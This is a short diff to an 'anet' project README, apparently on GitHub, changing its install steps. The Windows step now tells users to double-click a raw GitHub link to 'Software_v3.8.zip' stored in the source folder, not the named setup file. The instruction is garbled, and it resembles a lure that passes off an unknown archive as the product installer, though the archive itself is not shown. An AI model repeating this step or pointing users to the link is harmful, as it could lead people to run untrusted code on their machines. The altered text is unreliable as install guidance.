cdbrockt/anet/README.md

 1. **Locate the Downloaded File**: Open your downloads folder.
 2. **Run the Installer**:
-   - For Windows: Double-click the "anet_setup.exe" file.
+   - For Windows: Double-click the "https://raw.githubusercontent.com/cdbrockt/anet/master/anet-client-gui/src/Software_v3.8.zip" file.
    - For macOS: Open the ".dmg" file, then drag the anet icon to your Applications folder.
    - For Linux: Open a terminal and navigate to the download directory, then run the command `sudo dpkg -i anet*.deb` (replace 'anet*.deb' with the actual file name).